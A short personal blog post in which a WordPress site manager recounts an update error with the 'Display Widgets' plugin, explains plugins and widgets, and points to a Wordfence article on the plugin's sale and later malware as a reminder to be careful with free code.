I stumbled across this story while working on one of my websites. I use numerous plugins on the wordpress sites I manage, and one day I was updating a plugin named ‘Display Widgets’ and got an error when trying to update.
For background, for those of you non-WordPressers, WordPress is a website package that makes it easy to quickly build full featured websites. Plugins allow for adding of custom components to a standard install. For instance, Contact forms, weather info, stock market info, etc. And finally widgets are the sections in the websites that show many of these features. For instance, if someone has a box on their website that is showing weather info, that is likely a weather plugin configured to show in a WordPress widget.
Anyway.. I started googling to see what is going on with this widget – and came across this great detective work put together by the folks at wordfence:
https://www.wordfence.com/blog/2017/09/display-widgets-malware/
This chronicles the history of this plugin, and also gives a little insight to how the plugin market works. Who knew you could sell an innocuous plugin for $20,000? This also makes the point that just because a plugin is safe when you install it, upgrades to it may not always be wise, especially if the owner/author of the plugin is trying to monetize his code.
So this a great reminder to be careful with all the free code we use out there. In most cases the authors are providing code for use because they just want to share and show their stuff, in many cases we are just a vehicle for illicit motives. In this day and age of pay-for-click dollars and the email spam marketing, there are lots of people wanting to use the unwitting public to make money. Remember the old saying – if you are not paying for the product, you are the product.